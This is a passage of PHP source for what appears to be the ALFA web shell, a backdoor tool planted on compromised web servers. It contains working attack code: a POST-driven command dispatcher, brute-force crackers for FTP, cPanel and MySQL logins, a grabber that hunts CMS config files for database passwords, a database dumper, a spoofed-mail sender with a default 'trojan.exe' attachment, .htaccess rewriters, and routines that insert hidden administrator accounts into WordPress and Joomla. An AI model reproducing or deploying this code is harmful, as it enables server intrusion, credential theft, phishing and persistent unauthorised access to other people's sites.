(isset($value["multi_selector"])) { foreach ($value["multi_selector"] as $k => $v) { $color = alfa_getColor($key); $code = str_replace("{color}", $color, $v); $css .= $k . "{" . $code . "}"; } } } } return $css; } goto KdxiI; BQm_p: if (!function_exists("json_decode")) { function json_decode($json, $array = true) { $comment = false; $out = "$x="; for ($i = 0; $i < strlen($json); $i++) { if (!$comment) { if ($json[$i] == "{" || $json[$i] == "[") { $out .= " array("; } else { if ($json[$i] == "}" || $json[$i] == "]") { $out .= ")"; } else { if ($json[$i] == ":") { $out .= "=>"; } else { $out .= $json[$i]; } } } } else { $out .= $json[$i]; } if ($json[$i] == """) { $comment = !$comment; } } eval($out . ";"); return $x; } } goto tGJSi; uDSKO: if (!isset($GLOBALS["DB_NAME"]["post_encryption"])) { die("$GLOBALS['DB_NAME']['post_encryption']"); } goto qyg4S; rMYDl: function Alfa_FTP_Cracker($info) { $url = $info["protocol"] . $info["target"]; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_USERPWD, '' . $info["username"] . ":" . $info["password"] . ''); $result = @curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) { echo "<font color='red'>Error: {$curl_error}</font><br>"; } elseif (preg_match("/(\d+):(\d+)/i", $result)) { echo "UserName: <font color="red">" . $info["username"] . "</font> PassWord: <font color="red">" . $info["password"] . "</font><font color="green">  Login Success....</font><br>"; $info["target"] = $url; CrackerResualt($info); } curl_close($curl); } goto fCNwV; ctFJV: if (!empty($_POST["a"]) && function_exists("alfa" . $_POST["a"])) { call_user_func("alfa" . $_POST["a"]); } goto G40hn; EN_gw: function alfaWhich($p) { $path = alfaEx("which " . $p, false, false); if (!empty($path)) { return strlen($path); } return false; } goto FVVeJ; MPGhw: $GLOBALS["__file_path"] = str_replace("\", "/", trim(preg_replace("!\(\d+\)\s.*!", '', __FILE__))); goto PRamH; W1jEp: function alfaMarket() { echo "<div class='header'>"; $curl = new AlfaCURL(); $content = $curl->Send("http://solevisible.com/market.php"); $data = @json_decode($content, true); if (!empty($data)) { if ($data["status"] == "open") { echo $data["content"]; } else { echo $data["error_msg"]; } } else { echo "<div style='text-align:center;font-size:20px;'>Cant connect to the alfa market....! try later.</div>"; } echo "</div>"; } goto TWvKj; n0FgV: $GLOBALS["__ALFA_COLOR__"] = array("shell_border" => array("key_color" => "#0E304A", "multi_selector" => array(".header" => "border: 7px solid {color}", "#meunlist" => "border-color: {color}", "#hidden_sh" => "background-color: {color}", ".ajaxarea" => "border: 1px solid {color}", ".foot" => "border-color: {color}")), "header_vars" => "#27979B", "header_values" => "#67ABDF", "header_on" => "#00FF00", "header_off" => "#ff0000", "header_none" => "#00FF00", "home_shell" => "#ff0000", "home_shell:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".home_shell:hover" => "color: {color};")), "back_shell" => "#efbe73", "back_shell:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".back_shell:hover" => "color: {color};")), "header_pwd" => "#00FF00", "header_pwd:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".header_pwd:hover" => "color: {color};")), "header_drive" => "#00FF00", "header_drive:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".header_drive:hover" => "color: {color};")), "header_show_all" => "#00FF00", "disable_functions" => "#ff0000", "footer_text" => "#27979B", "menu_options" => "#27979B", "menu_options:hover" => array("key_color" => "#646464", "multi_selector" => array(".menu_options:hover" => "background-color: {color};font-weight: unset;")), "options_list" => array("key_color" => "#00FF00", "multi_selector" => array(".content_options_holder .header center a" => "color: {color};")), "options_list:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".content_options_holder .header center a:hover" => "color: {color};")), "options_list_header" => array("key_color" => "#59cc33", "multi_selector" => array(".txtfont_header" => "color: {color};")), "options_list_text" => array("key_color" => "#FFFFFF", "multi_selector" => array(".txtfont,.tbltxt" => "color: {color};")), "Alfa+" => array("key_color" => "#06ff0f", "multi_selector" => array(".alfa_plus" => "color: {color};font-weight: unset;")), "hidden_shell_text" => array("key_color" => "#00FF00", "multi_selector" => array("#hidden_sh a" => "color: {color};")), "hidden_shell_version" => "#ff0000", "shell_name" => "#FF0000", "main_row:hover" => array("key_color" => "#646464", "multi_selector" => array(".main tr:hover" => "background-color: {color};")), "main_header" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main th" => "color: {color};")), "main_name" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main .main_name" => "color: {color};font-weight: unset;")), "main_size" => "#67ABDF", "main_modify" => "#67ABDF", "main_owner_group" => "#67ABDF", "main_green_perm" => "#25ff00", "main_red_perm" => "#FF0000", "main_white_perm" => "#FFFFFF", "beetween_perms" => "#FFFFFF", "main_actions" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main .actions" => "color: {color};")), "menu_options:hover" => array("key_color" => "#646464", "multi_selector" => array(".menu_options:hover" => "background-color: {color};font-weight: unset;")), "minimize_editor_background" => array("key_color" => "#0e304a", "multi_selector" => array(".minimized-wrapper" => "background-color: {color};")), "minimize_editor_text" => array("key_color" => "#f5deb3", "multi_selector" => array(".minimized-text" => "color: {color};")), "editor_border" => array("key_color" => "#0e304a", "multi_selector" => array(".editor-explorer,.editor-modal" => "border: 2px solid {color};")), "editor_background" => array("key_color" => "rgba(0, 1, 23, 0.94)", "multi_selector" => array(".editor-explorer,.editor-modal" => "background-color: {color};")), "editor_header_background" => array("key_color" => "rgba(21, 66, 88, 0.93)", "multi_selector" => array(".editor-header" => "background-color: {color};")), "editor_header_text" => array("key_color" => "#00ff7f", "multi_selector" => array(".editor-path" => "color: {color};")), "editor_header_button" => array("key_color" => "#1d5673", "multi_selector" => array(".close-button, .editor-minimize" => "background-color: {color};")), "editor_actions" => array("key_color" => "#FFFFFF", "multi_selector" => array(".editor_actions" => "color: {color};")), "editor_file_info_vars" => array("key_color" => "#FFFFFF", "multi_selector" => array(".editor_file_info_vars" => "color: {color};")), "editor_file_info_values" => array("key_color" => "#67ABDF", "multi_selector" => array(".filestools" => "color: {color};")), "editor_history_header" => array("key_color" => "#14ff07", "multi_selector" => array(".hheader-text,.history-clear" => "color: {color};")), "editor_history_list" => array("key_color" => "#03b3a3", "multi_selector" => array(".editor-file-name" => "color: {color};")), "editor_history_selected_file" => array("key_color" => "rgba(49, 55, 93, 0.77)", "multi_selector" => array(".is_active" => "background-color: {color};")), "editor_history_file:hover" => array("key_color" => "#646464", "multi_selector" => array(".file-holder > .history:hover" => "background-color: {color};")), "input_box_border" => array("key_color" => "#0E304A", "multi_selector" => array("input[type=text],textarea" => "border: 1px solid {color}")), "input_box_text" => array("key_color" => "#999999", "multi_selector" => array("input[type=text],textarea" => "color: {color};")), "input_box:hover" => array("key_color" => "#27979B", "multi_selector" => array("input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "select_box_border" => array("key_color" => "#0E304A", "multi_selector" => array("select" => "border: 1px solid {color}")), "select_box_text" => array("key_color" => "#FFFFEE", "multi_selector" => array("select" => "color: {color};")), "select_box:hover" => array("key_color" => "#27979B", "multi_selector" => array("select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "button_border" => array("key_color" => "#27979B", "multi_selector" => array("input[type=submit],.button,#addup" => "border: 1px solid {color};")), "button:hover" => array("key_color" => "#27979B", "multi_selector" => array("input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};", ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "outputs_text" => array("key_color" => "#67ABDF", "multi_selector" => array(".ml1" => "color: {color};")), "outputs_border" => array("key_color" => "#0E304A", "multi_selector" => array(".ml1" => "border: 1px solid {color};")), "uploader_border" => array("key_color" => "#0E304A", "multi_selector" => array(".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "uploader_background" => array("key_color" => "#0E304A", "multi_selector" => array(".inputfile strong" => "background-color: {color};")), "uploader_text_right" => array("key_color" => "#FFFFFF", "multi_selector" => array(".inputfile strong" => "color: {color};")), "uploader_text_left" => array("key_color" => "#25ff00", "multi_selector" => array(".inputfile span" => "color: {color};")), "uploader:hover" => array("key_color" => "#27979B", "multi_selector" => array(".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "uploader_progress_bar" => array("key_color" => "#00ff00", "multi_selector" => array(".up_bar" => "background-color: {color};")), "mysql_tables" => "#00FF00", "mysql_table_count" => "#67ABDF", "copyright" => "#dfff00", "scrollbar" => array("key_color" => "#1e82b5", "multi_selector" => array("*::-webkit-scrollbar-thumb" => "background-color: {color};")), "scrollbar_background" => array("key_color" => "#000115", "multi_selector" => array("*::-webkit-scrollbar-track" => "background-color: {color};"))); goto MPGhw; wAV1i: if (!isset($GLOBALS["DB_NAME"]["pass"])) { die("$GLOBALS['DB_NAME']['pass']"); } goto XNV5Q; Rdxmc: function alfacoldumper() { alfahead(); echo "<div class="header">"; AlfaNum(8, 9, 10); echo "<center><br><div class='txtfont_header'>| Mysql Column Dumper |</div><br><br>" . getConfigHtml("all") . "<form method='post' onsubmit="var opt_id=this.getAttribute('opt_id');var delimiter='json';try{if($('dumper-delimiter-type').value == 'delimiter')delimiter=$('dumper-delimiter-input').value}catch(e){};g('coldumper',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;"><p>"; $delimiter = !empty($_POST["alfa1"]) ? $_POST["alfa1"] : "::"; $selected_data = json_decode($_POST["alfa2"], true); $username = $_POST["alfa3"]; $password = $_POST["alfa4"]; $dbname = $_POST["alfa5"]; $dfile = $_POST["alfa6"]; $host = $_POST["alfa7"]; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "db_host : ", "inputName" => "db_host", "id" => "db_host", "inputValue" => $host, "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "db_username : ", "inputName" => "db_username", "id" => "db_user", "inputValue" => $username, "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "db_password : ", "inputName" => "db_password", "id" => "db_pw", "inputValue" => $password, "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "db_name : ", "inputName" => "db_name", "id" => "db_name", "inputValue" => $dbname, "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Output Path: ", "inputName" => "dfile", "inputValue" => htmlspecialchars($GLOBALS["cwd"]), "inputSize" => "50")); create_table($table); echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>"; $db = false; if (!empty($dbname)) { $db = @mysqli_connect($host, $username, $password, $dbname); } if (count($selected_data) > 0) { if ($db) { if (!is_dir($dfile)) { $dfile = $GLOBALS["cwd"]; } $tbls = ''; $ext = ".txt"; if ($delimiter == "json") { $ext = ".json"; } foreach ($selected_data as $tbl => $cols) { $tables_query = mysqli_query($db, "SELECT " . implode(",", $cols) . " FROM {$tbl}"); $file_name = $dfile . "/" . $dbname . "." . $tbl . $ext; $fp = fopen($file_name, "w"); $data = array(); while ($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)) { if ($delimiter == "json") { $col_arr = array(); foreach ($row as $key => $value) { if (empty($value)) { $value = "[empty]"; } $col_arr[$key] = $value; } $data[$tbl][] = $col_arr; } else { $data = ''; foreach ($row as $key => $value) { if (empty($value)) { $value = "[empty]"; } $data .= $value . $delimiter; } fwrite($fp, $data . "
"); } } if ($delimiter == "json") { fwrite($fp, json_encode($data)); } fclose($fp); $tbls .= "Done ~~~> " . $file_name . "<br>"; } echo __pre(); echo "<center><font color='#00FF00'>" . $tbls . "</font></center>"; } } if (!empty($dbname) && count($selected_data) == 0) { if ($db) { echo "<hr><div style='text-align:center;margin-bottom:5px;font-weight:bolder;'><span>[ Select your tables and columns for dumping data ]</span></div>"; echo "<div style='text-align:center;'><span>Output Type: </span><select id='dumper-delimiter-type' onchange='colDumplerSelectType(this);' name='output_type'><option value='delimiter' selected>delimiter</option><option value='json'>json</option></select><div id='coldumper-delimiter-input' style='display:inline;'><span> Delimiter: </span><input id='dumper-delimiter-input' style='text-align:center;' type='text' name='delimiter' placeholder='eg: ,'></div></div>"; $data = array(); $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();"); while ($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)) { $data[$row["table_name"]] = array(); $table_count_q = mysqli_query($db, "SELECT count(*) FROM `" . $row["table_name"] . "`"); $table_count = mysqli_fetch_row($table_count_q); $data[$row["table_name"]]["data_count"] = $table_count[0]; $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '" . $row["table_name"] . "'"); while ($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) { $data[$row["table_name"]]["cols"][] = $row2["column_name"]; } } mysqli_close($db); echo "<ul id="myUL">"; foreach ($data as $tbl => $cols) { echo "<li><span style="color:#00FF00;" class="box">" . $tbl . " (" . $cols["data_count"] . ")</span><ul class="nested">"; foreach ($cols["cols"] as $col) { echo "<li tbl="" . $tbl . ""><span style="color:#00FF00;" tbl="" . $tbl . "" class="box sub-box">" . $col . "</span></li>"; } echo "</ul></li>"; } echo "</ul>"; } else { echo "<center>mysqli_connect : Error!</center>"; } } echo "</div>"; alfafooter(); } goto j0eD9; DwLPi: $default_action = "FilesMan2"; goto CUIqF; I6J3n: if (!function_exists("posix_getpwuid") && strpos(@ini_get("disable_functions"), "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto aI70a; RiRhw: function Alfa_ConfigGrabber($dir, $ext) { $pattern = "#define[ ]{0,}\([ ]{0,}(?:'|")DB_HOST(?:'|")[ ]{0,}|define[ ]{0,}\([ ]{0,}(?:'|")DB_HOSTNAME(?:'|")[ ]{0,}|config\[(?:'|")MasterServer(?:'|")\]\[(?:'|")password(?:'|")\]|(?:'|")database(?:'|")[ ]{0,}=>[ ]{0,}(?:'|")(.*?)(?:'|")|(?:'|")(mysql|database)(?:'|")[ ]{0,}=>[ ]{0,}array|db_name|db_user|db_pass|db_server|db_host|dbhost|dbname|dbuser|dbpass|database_name|database_user|database_pass|mysql_user|mysql_pass|mysqli_connect|mysql_connect|new[ ]{0,}mysqli#i"; $db_files = array("wp-config.php", "configure.php", "config.inc.php", "configuration.php", "config.php", "conf.php", "dbclass.php", "class_core.php", "dist-configure.php", "settings.php", "conf_global.php", "db.php", "connect.php", "confing.db.php", "config.db.php", "database.php"); if (@is_readable($dir)) { $globFiles = @glob("{$dir}/*.{$ext}"); $globDirs = @glob("{$dir}/*", GLOB_ONLYDIR); $blacklist = array(); foreach ($globDirs as $dir) { if (!@is_readable($dir) || @is_link($dir)) { continue; } @Alfa_ConfigGrabber($dir, $ext); } foreach ($globFiles as $file) { $filee = @file_get_contents($file); if (preg_match($pattern, $filee)) { echo "<div><span>{$file}</span> <a style='cursor:pointer;' onclick="editor('" . $file . "','auto','','','','file');">[ View file ]</a></div>"; } } } } goto qa1jm; Xrfh9: function Alfa_ReadDir($dir, $method = '', $defpage = '') { if (!@is_readable($dir)) { return false; } if (@is_dir($dir)) { if ($dh = @opendir($dir)) { while (($file = readdir($dh)) !== false) { if ($file == ".." || $file == ".") { continue; } $newfile = $dir . "/" . $file; if (@is_readable($newfile) && @is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } if (@is_file($newfile)) { if (!@is_readable($newfile)) { continue; } Alfa_Rewriter($newfile, $file, $defpage, $method); } } closedir($dh); } } } goto EM0SY; GoQ6c: function getConfigHtml($cms) { $content = ''; $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke", "phpbb" => "PHPBB", "mybb" => "MyBB", "drupal" => "Drupal", "smf" => "SMF"); $content .= "<form class='getconfig' onSubmit='g("GetConfig",null,this.cms.value,this.path.value,this.getAttribute("base_id"));return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>"; foreach ($cms_array as $key => $val) { $content .= "<option value='{$key}' " . ($key == $cms ? "selected=selected" : '') . ">{$val}</option>"; } $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='" . $_SERVER["DOCUMENT_ROOT"] . "/' size='30' /> <button class='button'>GetConfig</button>"; $content .= "</form>"; return $content; } goto IJ5CO; Os8cj: if (function_exists("set_magic_quotes_runtime")) { @set_magic_quotes_runtime(0); } goto rrdVW; Mhqc0: $GLOBALS["oZgNypoPRU"] = array("username" => "alfa", "password" => "a6f452ec3293d7fb72c5b677257b20ec", "safe_mode" => "0", "login_page" => "403", "show_icons" => "1", "post_encryption" => false, "cgi_api" => true); goto vT9b4; D8OYb: function alfacgihtaccess($m, $d = '', $symname = false) { $readme = ''; if ($symname) { $readme = "
ReadmeName " . trim($symname); } if ($m == "cgi") { $code = "#Coded By Sole Sad & Invisible\xaOptions FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .alfa\xaAddHandler cgi-script .alfa"; } elseif ($m == "sym") { $code = "#Coded By Sole Sad & Invisible\xaOptions Indexes FollowSymLinks
DirectoryIndex solevisible.phtm
AddType text/plain php html php4 phtml\xaAddHandler text/plain php html php4 phtml{$readme}
Options all"; } elseif ($m == "shtml") { $code = "Options +Includes\xaAddType text/html .shtml\xaAddHandler server-parsed .shtml"; } @__write_file($d . ".htaccess", $code); } goto fWEJX; BO4nz: $xd = "File Path : " . $_SERVER["DOCUMENT_ROOT"] . "\xd
"; goto e8nkk; GuGa9: unset($GLOBALS["oZgNypoPRU"]); goto B2mLV; B2mLV: if (!isset($_SERVER["HTTP_HOST"])) { die; } goto yJd4z; XNV5Q: if (!isset($GLOBALS["DB_NAME"]["safemode"])) { die("$GLOBALS['DB_NAME']['safemode']"); } goto ppnhy; kcHRT: function alfamail() { alfahead(); echo "<div class=header>"; AlfaNum(8, 9, 10); echo "<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g('mail',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,'>>',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mail To : ", "inputName" => "mail_to", "inputValue" => "[email protected]", "inputSize" => "60", "placeholder" => true), "td2" => array("color" => "FFFFFF", "tdName" => "From : ", "inputName" => "mail_from", "inputValue" => "[email protected]", "inputSize" => "60", "placeholder" => true), "td3" => array("color" => "FFFFFF", "tdName" => "Subject : ", "inputName" => "mail_subject", "inputValue" => "your site hacked by me", "inputSize" => "60"), "td4" => array("color" => "FFFFFF", "tdName" => "Attach File : ", "inputName" => "mail_attach", "inputValue" => $GLOBALS["cwd"] . "trojan.exe", "inputSize" => "60"), "td5" => array("color" => "FFFFFF", "tdName" => "Count Mail : ", "inputName" => "count_mail", "inputValue" => "1", "inputSize" => "60")); create_table($table); echo "<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>"; if (isset($_POST["alfa4"]) && $_POST["alfa4"] == ">>") { $mail_to = $_POST["alfa1"]; $mail_from = $_POST["alfa2"]; $mail_subject = $_POST["alfa3"]; $mail_content = $_POST["alfa5"]; $count_mail = (int) $_POST["alfa6"]; $mail_attach = $_POST["alfa7"]; if (filter_var($mail_to, FILTER_VALIDATE_EMAIL)) { if (!empty($mail_attach) && @is_file($mail_attach)) { $file = $mail_attach; $content = __read_file($file); $content = chunk_split(__ZW5jb2Rlcg($content)); $uid = md5(uniqid(time())); $filename = basename($file); $headers = "From: " . $mail_from . " <" . $mail_from . ">\xd\xa"; $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) 
\xa"; $headers .= "Reply-To: " . $mail_from . "
\xa"; $headers .= "Content-Type: multipart/mixed; boundary="" . $uid . ""
\xa
\xa"; $headers .= "MIME-Version: 1.0" . "
"; $headers .= "X-Mailer: php" . "
"; $mail_content = "--" . $uid . "
"; $mail_content .= "Content-type:text/plain; charset=iso-8859-1\xd
"; $mail_content .= "Content-Transfer-Encoding: 7bit
\xd\xa"; $mail_content .= $mail_content . "\xd

"; $mail_content .= "--" . $uid . "\xd\xa"; $mail_content .= "Content-Type: application/octet-stream; name="" . $filename . ""\xd
"; $mail_content .= "Content-Transfer-Encoding: base64\xd\xa"; $mail_content .= "Content-Disposition: attachment; filename="" . $filename . ""

\xa"; $mail_content .= $content . "
\xa
\xa"; $mail_content .= "--" . $uid . "--"; } else { $headers = "From: " . $mail_from . " ( " . $mail_from . " ) 
"; $headers .= "To: " . $mail_to . " ( " . $mail_to . " ) 
"; $headers .= "Reply-To: " . $mail_from . '' . "\xd\xa"; $headers .= "Content-type: text/html; charset=utf-8" . "\xd
"; $headers .= "MIME-Version: 1.0" . "
\xa"; $headers .= "X-Mailer: php" . "
\xa"; } if (empty($count_mail) || $count_mail < 1) { $count_mail = 1; } if (!empty($mail_from)) { echo __pre(); for ($i = 1; $i <= $count_mail; $i++) { if (@mail($mail_to, $mail_subject, $mail_content, $headers)) { echo "<center>Sent -> {$mail_to}<br></center>"; } } } else { __alert("Invalid Mail From !"); } } else { __alert("Invalid Mail To !"); } } echo "</div>"; alfafooter(); } goto yHc5O; te6n1: function Alfa_Call_Function_Cracker($method, $info) { switch ($method) { case "cp": return Alfa_CP_Cracker($info); break; case "direct": case "phpmyadmin": return Alfa_DirectAdmin_Cracker($info); break; case "ftp": return Alfa_FTP_Cracker($info); break; case "mysql": return Alfa_Mysql_Cracker($info); break; case "mysql": return Alfa_FTPC($info); break; } } goto tI2qh; yHc5O: function alfaziper() { alfahead(); AlfaNum(8, 9, 10); echo "<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>\xa<form onSubmit="g('ziper',null,null,null,this.dirzip.value,this.zipfile.value,'>>');return false;" method="post">
<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="" . (!empty($_POST["alfa3"]) ? htmlspecialchars($_POST["alfa3"]) : htmlspecialchars($GLOBALS["cwd"])) . "" size="60"/>\xa<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="" . $GLOBALS["cwd"] . "alfa.zip" size="60"/>\xa<input type="submit" value=" " name="ziper" />
</form></center></p>"; if (isset($_POST["alfa5"]) && $_POST["alfa5"] == ">>") { $dirzip = $_POST["alfa3"]; $zipfile = $_POST["alfa4"]; if ($GLOBALS["sys"] != "unix" && _alfa_can_runCommand(true, true)) { alfaEx("powershell Compress-Archive -Path '" . addslashes($dirzip) . "' -DestinationPath '" . addslashes(basename($zipfile)) . "'"); echo __pre() . "<center><p>Done -> <b><font color="green">" . $zipfile . "</font></b></p></center>"; } elseif ($GLOBALS["sys"] == "unix" && _alfa_can_runCommand(true, true)) { alfaEx("cd '" . addslashes(dirname($zipfile)) . "';zip -r '" . addslashes(basename($zipfile)) . "' '" . addslashes($dirzip) . "'"); echo __pre() . "<center><p>Done -> <b><font color="green">" . $zipfile . "</font></b></p></center>"; } elseif (class_exists("ZipArchive")) { if (__alfaziper($dirzip, $zipfile)) { echo __pre() . "<center><p><font color="green">Success...!<br>" . $zipfile . "</font></p></center>"; } else { echo __pre() . "<center><p><font color="red">ERROR!!!...</font></p></center>"; } } } echo "</div>"; alfafooter(); } goto qsZZV; aIT44: function alfapwchanger() { alfahead(); echo "<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>\xa<center><h3>"; $vals = array("WordPress" => array("wp", 2), "Joomla" => array("joomla", 3), "vBulletin" => array("vb", 5), "phpBB" => array("phpbb", 6), "WHMCS" => array("whmcs", 7), "MyBB" => array("mybb", 8), "Php Nuke" => array("nuke", 9), "Drupal" => array("drupal", 10), "SMF" => array("smf", 11)); Alfa_Create_A_Tag("pwchanger", $vals); echo "</h3></center>"; if (isset($_POST["alfa1"]) && $_POST["alfa1"] == "wp") { echo __pre() . "<center><center><div class="txtfont_header">| WordPress |</div>
<p>" . getConfigHtml("wp") . "</p><form onSubmit="g('pwchanger',null,'wp','>>',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => "wp_", "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "kh", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); create_table($table); echo "<p><input value=" " name="send" type="submit"></p></form>"; if ($_POST["alfa2"] && $_POST["alfa2"] == ">>") { $localhost = $_POST["alfa3"]; $database = $_POST["alfa4"]; $username = $_POST["alfa5"]; $password = $_POST["alfa6"]; $admin = $_POST["alfa8"]; $SQL = $_POST["alfa9"]; $prefix = $_POST["alfa10"]; $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (ID,user_login,user_pass,user_email) values(null,'{$admin}','d4a590caacc0be55ef286e40a945ea45','{$SQL}')") or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "select ID from " . $prefix . "users where user_login='" . $admin . "'") or die(mysqli_error($conn)); $sole = @mysqli_num_rows($solevisible); if ($sole == 1) { $solevis = @mysqli_fetch_assoc($solevisible); $res = $solevis["ID"]; } $solevisible = @mysqli_query($conn, "insert into " . $prefix . "usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'" . $res . "','first_name','solevisible'),(null,'" . $res . "','last_name','solevisible'),(null,'" . $res . "','nickname','solevisible'),(null,'" . $res . "','description','solevisible'),(null,'" . $res . "','rich_editing','true'),(null,'" . $res . "','comment_shortcuts','false'),(null,'" . $res . "','admin_color','fresh'),(null,'" . $res . "','use_ssl','0'),(null,'" . $res . "','show_admin_bar_front','true'),(null,'" . $res . "','" . $prefix . "capabilities','a:1:{s:13:"administrator";b:1;}'),(null,'" . $res . "','" . $prefix . "user_level','10'),(null,'" . $res . "','show_welcome_panel','1'),(null,'" . $res . "','" . $prefix . "dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn)); if ($solevisible) { __alert("Success... " . $admin . " is created..."); } } } if ($_POST["alfa2"] && $_POST["alfa2"] == "joomla") { echo __pre() . "<center><center><div class="txtfont_header">| Joomla |</div><p><p>" . getConfigHtml("joomla") . "</p><form onSubmit="g('pwchanger',null,'>>','joomla',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => "jos_", "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); create_table($table); echo "<p><input value=" " name="send" type="submit"></p></form></center>"; if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { $localhost = $_POST["alfa3"]; $database = $_POST["alfa4"]; $username = $_POST["alfa5"]; $password = $_POST["alfa6"]; $admin = $_POST["alfa8"]; $SQL = $_POST["alfa9"]; $prefix = $_POST["alfa10"]; $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (id,name,username,email,password) values(null,'Super User','" . $admin . "','" . $SQL . "','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "select id from " . $prefix . "users where username='" . $admin . "'") or die(mysqli_error($conn)); $sole = @mysqli_num_rows($solevisible); if ($sole == 1) { $solevis = @mysqli_fetch_assoc($solevisible); $res = $solevis["id"]; } $solevisible = @mysqli_query($conn, "INSERT INTO " . $prefix . "user_usergroup_map (user_id,group_id) VALUES ('" . $res . "', '8')") or die(mysqli_error($conn)); if ($solevisible) { 